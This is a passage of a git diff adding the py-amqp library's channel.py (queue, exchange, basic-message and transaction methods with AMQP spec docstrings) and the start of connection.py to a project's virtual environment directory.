server MUST accept a blank exchange name to + mean the default exchange. + + source: shortstr + + Specifies the name of the source exchange to bind. + + RULE: + + A client MUST NOT be allowed to bind a non- + existent source exchange. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + routing-key: shortstr + + Specifies the routing key for the binding. The routing + key is used for routing messages depending on the + exchange configuration. Not all exchanges use a + routing key - refer to the specific exchange + documentation. + + no-wait: bit + + arguments: table + + A set of arguments for the binding. The syntax and + semantics of these arguments depends on the exchange + class. + """ + return self.send_method( + spec.Exchange.Bind, argsig, + (0, destination, source, routing_key, nowait, arguments), + wait=None if nowait else spec.Exchange.BindOk, + ) + + def exchange_unbind(self, destination, source='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Unbind an exchange from an exchange. + + RULE: + + If a unbind fails, the server MUST raise a connection + exception. + + PARAMETERS: + reserved-1: short + + destination: shortstr + + Specifies the name of the destination exchange to + unbind. + + RULE: + + The client MUST NOT attempt to unbind an exchange + that does not exist from an exchange. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + source: shortstr + + Specifies the name of the source exchange to unbind. + + RULE: + + The client MUST NOT attempt to unbind an exchange + from an exchange that does not exist. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + routing-key: shortstr + + Specifies the routing key of the binding to unbind. + + no-wait: bit + + arguments: table + + Specifies the arguments of the binding to unbind. + """ + return self.send_method( + spec.Exchange.Unbind, argsig, + (0, destination, source, routing_key, nowait, arguments), + wait=None if nowait else spec.Exchange.UnbindOk, + ) + + ############# + # + # Queue + # + # + # work with queues + # + # Queues store and forward messages. Queues can be configured in + # the server or created at runtime. Queues must be attached to at + # least one exchange in order to receive messages from publishers. + # + # GRAMMAR:: + # + # queue = C:DECLARE S:DECLARE-OK + # / C:BIND S:BIND-OK + # / C:PURGE S:PURGE-OK + # / C:DELETE S:DELETE-OK + # + # RULE: + # + # A server MUST allow any content class to be sent to any + # queue, in any mix, and queue and delivery these content + # classes independently. Note that all methods that fetch + # content off queues are specific to a given content class. + # + + def queue_bind(self, queue, exchange='', routing_key='', + nowait=False, arguments=None, argsig='BsssbF'): + """Bind queue to an exchange. + + This method binds a queue to an exchange. Until a queue is + bound it will not receive any messages. In a classic + messaging model, store-and-forward queues are bound to a dest + exchange and subscription queues are bound to a dest_wild + exchange. + + RULE: + + A server MUST allow ignore duplicate bindings - that is, + two or more bind methods for a specific queue, with + identical arguments - without treating these as an error. + + RULE: + + If a bind fails, the server MUST raise a connection + exception. + + RULE: + + The server MUST NOT allow a durable queue to bind to a + transient exchange. If the client attempts this the server + MUST raise a channel exception. + + RULE: + + Bindings for durable queues are automatically durable and + the server SHOULD restore such bindings after a server + restart. + + RULE: + + The server SHOULD support at least 4 bindings per queue, + and ideally, impose no limit except as defined by + available resources. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to bind. If the queue + name is empty, refers to the current queue for the + channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + If the queue does not exist the server MUST raise + a channel exception with reply code 404 (not + found). + + exchange: shortstr + + The name of the exchange to bind to. + + RULE: + + If the exchange does not exist the server MUST + raise a channel exception with reply code 404 (not + found). + + routing_key: shortstr + + message routing key + + Specifies the routing key for the binding. The + routing key is used for routing messages depending on + the exchange configuration. Not all exchanges use a + routing key - refer to the specific exchange + documentation. If the routing key is empty and the + queue name is empty, the routing key will be the + current queue for the channel, which is the last + declared queue. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for binding + + A set of arguments for the binding. The syntax and + semantics of these arguments depends on the exchange + class. + """ + return self.send_method( + spec.Queue.Bind, argsig, + (0, queue, exchange, routing_key, nowait, arguments), + wait=None if nowait else spec.Queue.BindOk, + ) + + def queue_unbind(self, queue, exchange, routing_key='', + nowait=False, arguments=None, argsig='BsssF'): + """Unbind a queue from an exchange. + + This method unbinds a queue from an exchange. + + RULE: + + If a unbind fails, the server MUST raise a connection exception. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to unbind. + + RULE: + + The client MUST either specify a queue name or have + previously declared a queue on the same channel + + RULE: + + The client MUST NOT attempt to unbind a queue that + does not exist. + + exchange: shortstr + + The name of the exchange to unbind from. + + RULE: + + The client MUST NOT attempt to unbind a queue from an + exchange that does not exist. + + RULE: + + The server MUST accept a blank exchange name to mean + the default exchange. + + routing_key: shortstr + + routing key of binding + + Specifies the routing key of the binding to unbind. + + arguments: table + + arguments of binding + + Specifies the arguments of the binding to unbind. + """ + return self.send_method( + spec.Queue.Unbind, argsig, + (0, queue, exchange, routing_key, arguments), + wait=None if nowait else spec.Queue.UnbindOk, + ) + + def queue_declare(self, queue='', passive=False, durable=False, + exclusive=False, auto_delete=True, nowait=False, + arguments=None, argsig='BsbbbbbF'): + """Declare queue, create if needed. + + This method creates or checks a queue. When creating a new + queue the client can specify various properties that control + the durability of the queue and its contents, and the level of + sharing for the queue. + + RULE: + + The server MUST create a default binding for a newly- + created queue to the default exchange, which is an + exchange of type 'direct'. + + RULE: + + The server SHOULD support a minimum of 256 queues per + virtual host and ideally, impose no limit except as + defined by available resources. + + PARAMETERS: + queue: shortstr + + RULE: + + The queue name MAY be empty, in which case the + server MUST create a new queue with a unique + generated name and return this to the client in + the Declare-Ok method. + + RULE: + + Queue names starting with "amq." are reserved for + predeclared and standardised server queues. If + the queue name starts with "amq." and the passive + option is False, the server MUST raise a connection + exception with reply code 403 (access refused). + + passive: boolean + + do not create queue + + If set, the server will not create the queue. The + client can use this to check whether a queue exists + without modifying the server state. + + RULE: + + If set, and the queue does not already exist, the + server MUST respond with a reply code 404 (not + found) and raise a channel exception. + + durable: boolean + + request a durable queue + + If set when creating a new queue, the queue will be + marked as durable. Durable queues remain active when + a server restarts. Non-durable queues (transient + queues) are purged if/when a server restarts. Note + that durable queues do not necessarily hold persistent + messages, although it does not make sense to send + persistent messages to a transient queue. + + RULE: + + The server MUST recreate the durable queue after a + restart. + + RULE: + + The server MUST support both durable and transient + queues. + + RULE: + + The server MUST ignore the durable field if the + queue already exists. + + exclusive: boolean + + request an exclusive queue + + Exclusive queues may only be consumed from by the + current connection. Setting the 'exclusive' flag + always implies 'auto-delete'. + + RULE: + + The server MUST support both exclusive (private) + and non-exclusive (shared) queues. + + RULE: + + The server MUST raise a channel exception if + 'exclusive' is specified and the queue already + exists and is owned by a different connection. + + auto_delete: boolean + + auto-delete queue when unused + + If set, the queue is deleted when all consumers have + finished using it. Last consumer can be cancelled + either explicitly or because its channel is closed. If + there was no consumer ever on the queue, it won't be + deleted. + + RULE: + + The server SHOULD allow for a reasonable delay + between the point when it determines that a queue + is not being used (or no longer used), and the + point when it deletes the queue. At the least it + must allow a client to create a queue and then + create a consumer to read from it, with a small + but non-zero delay between these two actions. The + server should equally allow for clients that may + be disconnected prematurely, and wish to re- + consume from the same queue without losing + messages. We would recommend a configurable + timeout, with a suitable default value being one + minute. + + RULE: + + The server MUST ignore the auto-delete field if + the queue already exists. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + arguments: table + + arguments for declaration + + A set of arguments for the declaration. The syntax and + semantics of these arguments depends on the server + implementation. This field is ignored if passive is + True. + + Returns a tuple containing 3 items: + the name of the queue (essential for automatically-named queues), + message count and + consumer count + """ + self.send_method( + spec.Queue.Declare, argsig, + (0, queue, passive, durable, exclusive, auto_delete, + nowait, arguments), + ) + if not nowait: + return queue_declare_ok_t(*self.wait( + spec.Queue.DeclareOk, returns_tuple=True, + )) + + def queue_delete(self, queue='', + if_unused=False, if_empty=False, nowait=False, + argsig='Bsbbb'): + """Delete a queue. + + This method deletes a queue. When a queue is deleted any + pending messages are sent to a dead-letter queue if this is + defined in the server configuration, and all consumers on the + queue are cancelled. + + RULE: + + The server SHOULD use a dead-letter queue to hold messages + that were pending on a deleted queue, and MAY provide + facilities for a system administrator to move these + messages back to an active queue. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to delete. If the + queue name is empty, refers to the current queue for + the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + The queue must exist. Attempting to delete a non- + existing queue causes a channel exception. + + if_unused: boolean + + delete only if unused + + If set, the server will only delete the queue if it + has no consumers. If the queue has consumers the + server does does not delete it but raises a channel + exception instead. + + RULE: + + The server MUST respect the if-unused flag when + deleting a queue. + + if_empty: boolean + + delete only if empty + + If set, the server will only delete the queue if it + has no messages. If the queue is not empty the server + raises a channel exception. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + If nowait is False, returns the number of deleted messages. + """ + return self.send_method( + spec.Queue.Delete, argsig, + (0, queue, if_unused, if_empty, nowait), + wait=None if nowait else spec.Queue.DeleteOk, + ) + + def queue_purge(self, queue='', nowait=False, argsig='Bsb'): + """Purge a queue. + + This method removes all messages from a queue. It does not + cancel consumers. Purged messages are deleted without any + formal "undo" mechanism. + + RULE: + + A call to purge MUST result in an empty queue. + + RULE: + + On transacted channels the server MUST not purge messages + that have already been sent to a client but not yet + acknowledged. + + RULE: + + The server MAY implement a purge queue or log that allows + system administrators to recover accidentally-purged + messages. The server SHOULD NOT keep purged messages in + the same storage spaces as the live messages since the + volumes of purged messages may get very large. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to purge. If the + queue name is empty, refers to the current queue for + the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + RULE: + + The queue must exist. Attempting to purge a non- + existing queue causes a channel exception. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + If nowait is False, returns a number of purged messages. + """ + return self.send_method( + spec.Queue.Purge, argsig, (0, queue, nowait), + wait=None if nowait else spec.Queue.PurgeOk, + ) + + ############# + # + # Basic + # + # + # work with basic content + # + # The Basic class provides methods that support an industry- + # standard messaging model. + # + # GRAMMAR:: + # + # basic = C:QOS S:QOS-OK + # / C:CONSUME S:CONSUME-OK + # / C:CANCEL S:CANCEL-OK + # / C:PUBLISH content + # / S:RETURN content + # / S:DELIVER content + # / C:GET ( S:GET-OK content / S:GET-EMPTY ) + # / C:ACK + # / C:REJECT + # + # RULE: + # + # The server SHOULD respect the persistent property of basic + # messages and SHOULD make a best-effort to hold persistent + # basic messages on a reliable storage mechanism. + # + # RULE: + # + # The server MUST NOT discard a persistent basic message in + # case of a queue overflow. The server MAY use the + # Channel.Flow method to slow or stop a basic message + # publisher when necessary. + # + # RULE: + # + # The server MAY overflow non-persistent basic messages to + # persistent storage and MAY discard or dead-letter non- + # persistent basic messages on a priority basis if the queue + # size exceeds some configured limit. + # + # RULE: + # + # The server MUST implement at least 2 priority levels for + # basic messages, where priorities 0-4 and 5-9 are treated as + # two distinct levels. The server MAY implement up to 10 + # priority levels. + # + # RULE: + # + # The server MUST deliver messages of the same priority in + # order irrespective of their individual persistence. + # + # RULE: + # + # The server MUST support both automatic and explicit + # acknowledgments on Basic content. + # + + def basic_ack(self, delivery_tag, multiple=False, argsig='Lb'): + """Acknowledge one or more messages. + + This method acknowledges one or more messages delivered via + the Deliver or Get-Ok methods. The client can ask to confirm + a single message or a set of messages up to and including a + specific message. + + PARAMETERS: + delivery_tag: longlong + + server-assigned delivery tag + + The server-assigned and channel-specific delivery tag + + RULE: + + The delivery tag is valid only within the channel + from which the message was received. I.e. a client + MUST NOT receive a message on one channel and then + acknowledge it on another. + + RULE: + + The server MUST NOT use a zero value for delivery + tags. Zero is reserved for client use, meaning "all + messages so far received". + + multiple: boolean + + acknowledge multiple messages + + If set to True, the delivery tag is treated as "up to + and including", so that the client can acknowledge + multiple messages with a single method. If set to + False, the delivery tag refers to a single message. + If the multiple field is True, and the delivery tag + is zero, tells the server to acknowledge all + outstanding messages. + + RULE: + + The server MUST validate that a non-zero delivery- + tag refers to an delivered message, and raise a + channel exception if this is not the case. + """ + return self.send_method( + spec.Basic.Ack, argsig, (delivery_tag, multiple), + ) + + def basic_cancel(self, consumer_tag, nowait=False, argsig='sb'): + """End a queue consumer. + + This method cancels a consumer. This does not affect already + delivered messages, but it does mean the server will not send + any more messages for that consumer. The client may receive + an arbitrary number of messages in between sending the cancel + method and receiving the cancel-ok reply. + + RULE: + + If the queue no longer exists when the client sends a + cancel command, or the consumer has been cancelled for + other reasons, this command has no effect. + + PARAMETERS: + consumer_tag: shortstr + + consumer tag + + Identifier for the consumer, valid within the current + connection. + + RULE: + + The consumer tag is valid only within the channel + from which the consumer was created. I.e. a client + MUST NOT create a consumer in one channel and then + use it in another. + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + """ + if self.connection is not None: + self.no_ack_consumers.discard(consumer_tag) + return self.send_method( + spec.Basic.Cancel, argsig, (consumer_tag, nowait), + wait=None if nowait else spec.Basic.CancelOk, + ) + + def _on_basic_cancel(self, consumer_tag): + """Consumer cancelled by server. + + Most likely the queue was deleted. + + """ + callback = self._remove_tag(consumer_tag) + if callback: + callback(consumer_tag) + else: + raise ConsumerCancelled(consumer_tag, spec.Basic.Cancel) + + def _on_basic_cancel_ok(self, consumer_tag): + self._remove_tag(consumer_tag) + + def _remove_tag(self, consumer_tag): + self.callbacks.pop(consumer_tag, None) + return self.cancel_callbacks.pop(consumer_tag, None) + + def basic_consume(self, queue='', consumer_tag='', no_local=False, + no_ack=False, exclusive=False, nowait=False, + callback=None, arguments=None, on_cancel=None, + argsig='BssbbbbF'): + """Start a queue consumer. + + This method asks the server to start a "consumer", which is a + transient request for messages from a specific queue. + Consumers last as long as the channel they were created on, or + until the client cancels them. + + RULE: + + The server SHOULD support at least 16 consumers per queue, + unless the queue was declared as private, and ideally, + impose no limit except as defined by available resources. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to consume from. If + the queue name is null, refers to the current queue + for the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + consumer_tag: shortstr + + Specifies the identifier for the consumer. The + consumer tag is local to a connection, so two clients + can use the same consumer tags. If this field is empty + the server will generate a unique tag. + + RULE: + + The tag MUST NOT refer to an existing consumer. If + the client attempts to create two consumers with + the same non-empty tag the server MUST raise a + connection exception with reply code 530 (not + allowed). + + no_local: boolean + + do not deliver own messages + + If the no-local field is set the server will not send + messages to the client that published them. + + no_ack: boolean + + no acknowledgment needed + + If this field is set the server does not expect + acknowledgments for messages. That is, when a message + is delivered to the client the server automatically and + silently acknowledges it on behalf of the client. This + functionality increases performance but at the cost of + reliability. Messages can get lost if a client dies + before it can deliver them to the application. + + exclusive: boolean + + request exclusive access + + Request exclusive consumer access, meaning only this + consumer can access the queue. + + RULE: + + If the server cannot grant exclusive access to the + queue when asked, - because there are other + consumers active - it MUST raise a channel + exception with return code 403 (access refused). + + nowait: boolean + + do not send a reply method + + If set, the server will not respond to the method. The + client should not wait for a reply method. If the + server could not complete the method it will raise a + channel or connection exception. + + callback: Python callable + + function/method called with each delivered message + + For each message delivered by the broker, the + callable will be called with a Message object + as the single argument. If no callable is specified, + messages are quietly discarded, no_ack should probably + be set to True in that case. + """ + p = self.send_method( + spec.Basic.Consume, argsig, + ( + 0, queue, consumer_tag, no_local, no_ack, exclusive, + nowait, arguments + ), + wait=None if nowait else spec.Basic.ConsumeOk, + returns_tuple=True + ) + + if not nowait: + # send_method() returns (consumer_tag,) tuple. + # consumer_tag is returned by broker using following rules: + # * consumer_tag is not specified by client, random one + # is generated by Broker + # * consumer_tag is provided by client, the same one + # is returned by broker + consumer_tag = p[0] + elif nowait and not consumer_tag: + raise ValueError( + 'Consumer tag must be specified when nowait is True' + ) + + self.callbacks[consumer_tag] = callback + + if on_cancel: + self.cancel_callbacks[consumer_tag] = on_cancel + if no_ack: + self.no_ack_consumers.add(consumer_tag) + + if not nowait: + return consumer_tag + else: + return p + + def _on_basic_deliver(self, consumer_tag, delivery_tag, redelivered, + exchange, routing_key, msg): + msg.channel = self + msg.delivery_info = { + 'consumer_tag': consumer_tag, + 'delivery_tag': delivery_tag, + 'redelivered': redelivered, + 'exchange': exchange, + 'routing_key': routing_key, + } + + try: + fun = self.callbacks[consumer_tag] + except KeyError: + AMQP_LOGGER.warning( + REJECTED_MESSAGE_WITHOUT_CALLBACK, + delivery_tag, consumer_tag, exchange, routing_key, + ) + self.basic_reject(delivery_tag, requeue=True) + else: + fun(msg) + + def basic_get(self, queue='', no_ack=False, argsig='Bsb'): + """Direct access to a queue. + + This method provides a direct access to the messages in a + queue using a synchronous dialogue that is designed for + specific types of application where synchronous functionality + is more important than performance. + + PARAMETERS: + queue: shortstr + + Specifies the name of the queue to consume from. If + the queue name is null, refers to the current queue + for the channel, which is the last declared queue. + + RULE: + + If the client did not previously declare a queue, + and the queue name in this method is empty, the + server MUST raise a connection exception with + reply code 530 (not allowed). + + no_ack: boolean + + no acknowledgment needed + + If this field is set the server does not expect + acknowledgments for messages. That is, when a message + is delivered to the client the server automatically and + silently acknowledges it on behalf of the client. This + functionality increases performance but at the cost of + reliability. Messages can get lost if a client dies + before it can deliver them to the application. + + Non-blocking, returns a amqp.basic_message.Message object, + or None if queue is empty. + """ + ret = self.send_method( + spec.Basic.Get, argsig, (0, queue, no_ack), + wait=[spec.Basic.GetOk, spec.Basic.GetEmpty], returns_tuple=True, + ) + if not ret or len(ret) < 2: + return self._on_get_empty(*ret) + return self._on_get_ok(*ret) + + def _on_get_empty(self, cluster_id=None): + pass + + def _on_get_ok(self, delivery_tag, redelivered, exchange, routing_key, + message_count, msg): + msg.channel = self + msg.delivery_info = { + 'delivery_tag': delivery_tag, + 'redelivered': redelivered, + 'exchange': exchange, + 'routing_key': routing_key, + 'message_count': message_count + } + return msg + + def _basic_publish(self, msg, exchange='', routing_key='', + mandatory=False, immediate=False, timeout=None, + confirm_timeout=None, + argsig='Bssbb'): + """Publish a message. + + This method publishes a message to a specific exchange. The + message will be routed to queues as defined by the exchange + configuration and distributed to any active consumers when the + transaction, if any, is committed. + + When channel is in confirm mode (when Connection parameter + confirm_publish is set to True), each message is confirmed. + When broker rejects published message (e.g. due internal broker + constrains), MessageNacked exception is raised and + set confirm_timeout to wait maximum confirm_timeout second + for message to confirm. + + PARAMETERS: + exchange: shortstr + + Specifies the name of the exchange to publish to. The + exchange name can be empty, meaning the default + exchange. If the exchange name is specified, and that + exchange does not exist, the server will raise a + channel exception. + + RULE: + + The server MUST accept a blank exchange name to + mean the default exchange. + + RULE: + + The exchange MAY refuse basic content in which + case it MUST raise a channel exception with reply + code 540 (not implemented). + + routing_key: shortstr + + Message routing key + + Specifies the routing key for the message. The + routing key is used for routing messages depending on + the exchange configuration. + + mandatory: boolean + + indicate mandatory routing + + This flag tells the server how to react if the message + cannot be routed to a queue. If this flag is True, the + server will return an unroutable message with a Return + method. If this flag is False, the server silently + drops the message. + + RULE: + + The server SHOULD implement the mandatory flag. + + immediate: boolean + + request immediate delivery + + This flag tells the server how to react if the message + cannot be routed to a queue consumer immediately. If + this flag is set, the server will return an + undeliverable message with a Return method. If this + flag is zero, the server will queue the message, but + with no guarantee that it will ever be consumed. + + RULE: + + The server SHOULD implement the immediate flag. + + timeout: short + + timeout for publish + + Set timeout to wait maximum timeout second + for message to publish. + + confirm_timeout: short + + confirm_timeout for publish in confirm mode + + When the channel is in confirm mode set + confirm_timeout to wait maximum confirm_timeout + second for message to confirm. + + """ + if not self.connection: + raise RecoverableConnectionError( + 'basic_publish: connection closed') + + capabilities = self.connection. \ + client_properties.get('capabilities', {}) + if capabilities.get('connection.blocked', False): + try: + # Check if an event was sent, such as the out of memory message + self.connection.drain_events(timeout=0) + except socket.timeout: + pass + + try: + with self.connection.transport.having_timeout(timeout): + return self.send_method( + spec.Basic.Publish, argsig, + (0, exchange, routing_key, mandatory, immediate), msg + ) + except socket.timeout: + raise RecoverableChannelError('basic_publish: timed out') + + basic_publish = _basic_publish + + def basic_publish_confirm(self, *args, **kwargs): + confirm_timeout = kwargs.pop('confirm_timeout', None) + + def confirm_handler(method, *args): + # When RMQ nacks message we are raising MessageNacked exception + if method == spec.Basic.Nack: + raise MessageNacked() + + if not self._confirm_selected: + self._confirm_selected = True + self.confirm_select() + ret = self._basic_publish(*args, **kwargs) + # Waiting for confirmation of message. + timeout = confirm_timeout or kwargs.get('timeout', None) + self.wait([spec.Basic.Ack, spec.Basic.Nack], + callback=confirm_handler, + timeout=timeout) + return ret + + def basic_qos(self, prefetch_size, prefetch_count, a_global, + argsig='lBb'): + """Specify quality of service. + + This method requests a specific quality of service. The QoS + can be specified for the current channel or for all channels + on the connection. The particular properties and semantics of + a qos method always depend on the content class semantics. + Though the qos method could in principle apply to both peers, + it is currently meaningful only for the server. + + PARAMETERS: + prefetch_size: long + + prefetch window in octets + + The client can request that messages be sent in + advance so that when the client finishes processing a + message, the following message is already held + locally, rather than needing to be sent down the + channel. Prefetching gives a performance improvement. + This field specifies the prefetch window size in + octets. The server will send a message in advance if + it is equal to or smaller in size than the available + prefetch size (and also falls into other prefetch + limits). May be set to zero, meaning "no specific + limit", although other prefetch limits may still + apply. The prefetch-size is ignored if the no-ack + option is set. + + RULE: + + The server MUST ignore this setting when the + client is not processing any messages - i.e. the + prefetch size does not limit the transfer of + single messages to a client, only the sending in + advance of more messages while the client still + has one or more unacknowledged messages. + + prefetch_count: short + + prefetch window in messages + + Specifies a prefetch window in terms of whole + messages. This field may be used in combination with + the prefetch-size field; a message will only be sent + in advance if both prefetch windows (and those at the + channel and connection level) allow it. The prefetch- + count is ignored if the no-ack option is set. + + RULE: + + The server MAY send less data in advance than + allowed by the client's specified prefetch windows + but it MUST NOT send more. + + a_global: boolean + + Defines a scope of QoS. Semantics of this parameter differs + between AMQP 0-9-1 standard and RabbitMQ broker: + + MEANING IN AMQP 0-9-1: + False: shared across all consumers on the channel + True: shared across all consumers on the connection + MEANING IN RABBITMQ: + False: applied separately to each new consumer + on the channel + True: shared across all consumers on the channel + """ + return self.send_method( + spec.Basic.Qos, argsig, (prefetch_size, prefetch_count, a_global), + wait=spec.Basic.QosOk, + ) + + def basic_recover(self, requeue=False): + """Redeliver unacknowledged messages. + + This method asks the broker to redeliver all unacknowledged + messages on a specified channel. Zero or more messages may be + redelivered. This method is only allowed on non-transacted + channels. + + RULE: + + The server MUST set the redelivered flag on all messages + that are resent. + + RULE: + + The server MUST raise a channel exception if this is + called on a transacted channel. + + PARAMETERS: + requeue: boolean + + requeue the message + + If this field is False, the message will be redelivered + to the original recipient. If this field is True, the + server will attempt to requeue the message, + potentially then delivering it to an alternative + subscriber. + """ + return self.send_method(spec.Basic.Recover, 'b', (requeue,)) + + def basic_recover_async(self, requeue=False): + return self.send_method(spec.Basic.RecoverAsync, 'b', (requeue,)) + + def basic_reject(self, delivery_tag, requeue, argsig='Lb'): + """Reject an incoming message. + + This method allows a client to reject a message. It can be + used to interrupt and cancel large incoming messages, or + return untreatable messages to their original queue. + + RULE: + + The server SHOULD be capable of accepting and process the + Reject method while sending message content with a Deliver + or Get-Ok method. I.e. the server should read and process + incoming methods while sending output frames. To cancel a + partially-send content, the server sends a content body + frame of size 1 (i.e. with no data except the frame-end + octet). + + RULE: + + The server SHOULD interpret this method as meaning that + the client is unable to process the message at this time. + + RULE: + + A client MUST NOT use this method as a means of selecting + messages to process. A rejected message MAY be discarded + or dead-lettered, not necessarily passed to another + client. + + PARAMETERS: + delivery_tag: longlong + + server-assigned delivery tag + + The server-assigned and channel-specific delivery tag + + RULE: + + The delivery tag is valid only within the channel + from which the message was received. I.e. a client + MUST NOT receive a message on one channel and then + acknowledge it on another. + + RULE: + + The server MUST NOT use a zero value for delivery + tags. Zero is reserved for client use, meaning "all + messages so far received". + + requeue: boolean + + requeue the message + + If this field is False, the message will be discarded. + If this field is True, the server will attempt to + requeue the message. + + RULE: + + The server MUST NOT deliver the message to the + same client within the context of the current + channel. The recommended strategy is to attempt + to deliver the message to an alternative consumer, + and if that is not possible, to move the message + to a dead-letter queue. The server MAY use more + sophisticated tracking to hold the message on the + queue and redeliver it to the same client at a + later stage. + """ + return self.send_method( + spec.Basic.Reject, argsig, (delivery_tag, requeue), + ) + + def _on_basic_return(self, reply_code, reply_text, + exchange, routing_key, message): + """Return a failed message. + + This method returns an undeliverable message that was + published with the "immediate" flag set, or an unroutable + message published with the "mandatory" flag set. The reply + code and text provide information about the reason that the + message was undeliverable. + + PARAMETERS: + reply_code: short + + The reply code. The AMQ reply codes are defined in AMQ + RFC 011. + + reply_text: shortstr + + The localised reply text. This text can be logged as an + aid to resolving issues. + + exchange: shortstr + + Specifies the name of the exchange that the message + was originally published to. + + routing_key: shortstr + + Message routing key + + Specifies the routing key name specified when the + message was published. + """ + exc = error_for_code( + reply_code, reply_text, spec.Basic.Return, ChannelError, + ) + handlers = self.events.get('basic_return') + if not handlers: + raise exc + for callback in handlers: + callback(exc, exchange, routing_key, message) + + ############# + # + # Tx + # + # + # work with standard transactions + # + # Standard transactions provide so-called "1.5 phase commit". We + # can ensure that work is never lost, but there is a chance of + # confirmations being lost, so that messages may be resent. + # Applications that use standard transactions must be able to + # detect and ignore duplicate messages. + # + # GRAMMAR:: + # + # tx = C:SELECT S:SELECT-OK + # / C:COMMIT S:COMMIT-OK + # / C:ROLLBACK S:ROLLBACK-OK + # + # RULE: + # + # An client using standard transactions SHOULD be able to + # track all messages received within a reasonable period, and + # thus detect and reject duplicates of the same message. It + # SHOULD NOT pass these to the application layer. + # + # + + def tx_commit(self): + """Commit the current transaction. + + This method commits all messages published and acknowledged in + the current transaction. A new transaction starts immediately + after a commit. + """ + return self.send_method(spec.Tx.Commit, wait=spec.Tx.CommitOk) + + def tx_rollback(self): + """Abandon the current transaction. + + This method abandons all messages published and acknowledged + in the current transaction. A new transaction starts + immediately after a rollback. + """ + return self.send_method(spec.Tx.Rollback, wait=spec.Tx.RollbackOk) + + def tx_select(self): + """Select standard transaction mode. + + This method sets the channel to use standard transactions. + The client must use this method at least once on a channel + before using the Commit or Rollback methods. + """ + return self.send_method(spec.Tx.Select, wait=spec.Tx.SelectOk) + + def confirm_select(self, nowait=False): + """Enable publisher confirms for this channel. + + Note: This is an RabbitMQ extension. + + Can now be used if the channel is in transactional mode. + + :param nowait: + If set, the server will not respond to the method. + The client should not wait for a reply method. If the + server could not complete the method it will raise a channel + or connection exception. + """ + return self.send_method( + spec.Confirm.Select, 'b', (nowait,), + wait=None if nowait else spec.Confirm.SelectOk, + ) + + def _on_basic_ack(self, delivery_tag, multiple): + for callback in self.events['basic_ack']: + callback(delivery_tag, multiple) + + def _on_basic_nack(self, delivery_tag, multiple): + for callback in self.events['basic_nack']: + callback(delivery_tag, multiple) diff --git a/env/Lib/site-packages/amqp/connection.py b/env/Lib/site-packages/amqp/connection.py new file mode 100644 index 00000000..24bfb667 --- /dev/null +++ b/env/Lib/site-packages/amqp/connection.py @@ -0,0 +1,778 @@ +"""AMQP Connections.""" +# Copyright (C) 2007-2008 Barry Pederson + +import logging +import socket +import uuid +import warnings +from array import array +from time import monotonic + +from vine import ensure_promise + +from . import __version__, sasl, spec +from .abstract_channel import AbstractChannel +from .channel import Channel +from .exceptions import (AMQPDeprecationWarning, ChannelError, ConnectionError, + ConnectionForced, RecoverableChannelError, + RecoverableConnectionError, ResourceError, + error_for_code) +from .method_framing import frame_handler, frame_writer +from .transport import Transport + +try: + from ssl import SSLError +except ImportError: # pragma: no cover + class SSLError(Exception): # noqa + pass + +W_FORCE_CONNECT = """\ +The .{attr} attribute on the connection was accessed before +the connection was established. This is supported for now, but will +be deprecated in amqp 2.2.0. + +Since amqp 2.0 you have to explicitly call Connection.connect() +before using the connection. +""" + +START_DEBUG_FMT = """ +Start from server, version: %d.%d, properties: %s, mechanisms: %s, locales: %s +""".strip() + +__all__ = ('Connection',) + +AMQP_LOGGER = logging.getLogger('amqp') +AMQP_HEARTBEAT_LOGGER = logging.getLogger( + 'amqp.connection.Connection.heartbeat_tick' +) + +#: Default map for :attr:`Connection.library_properties` +LIBRARY_PROPERTIES = { + 'product': 'py-amqp', + 'product_version': __version__, +} + +#: Default map for :attr:`Connection.negotiate_capabilities` +NEGOTIATE_CAPABILITIES = { + 'consumer_cancel_notify': True, + 'connection.blocked': True, + 'authentication_failure_close': True, +} + + +class Connection(AbstractChannel): + """AMQP Connection. + + The connection class provides methods for a client to establish a + network connection to a server, and for both peers to operate the + connection thereafter. + + GRAMMAR:: + + connection = open-connection *use-connection close-connection + open-connection = C:protocol-header + S:START C:START-OK + *challenge + S:TUNE C:TUNE-OK + C:OPEN S:OPEN-OK + challenge = S:SECURE C:SECURE-OK + use-connection = *channel + close-connection = C:CLOSE S:CLOSE-OK + / S:CLOSE C:CLOSE-OK + Create a connection to the specified host, which should be + a 'host[:port]', such as 'localhost', or '1.2.3.4:5672' + (defaults to 'localhost', if a port is not specified then + 5672 is used) + + Authentication can be controlled by passing one or more + `amqp.sasl.SASL` instances as the `authentication` parameter, or + setting the `login_method` string to one of the supported methods: + 'GSSAPI', 'EXTERNAL', 'AMQPLAIN', or 'PLAIN'. + Otherwise authentication will be performed using any supported method + preferred by the server. Userid and passwords apply to AMQPLAIN and + PLAIN authentication, whereas on GSSAPI only userid will be used as the + client name. For EXTERNAL authentication both userid and password are + ignored. + + The 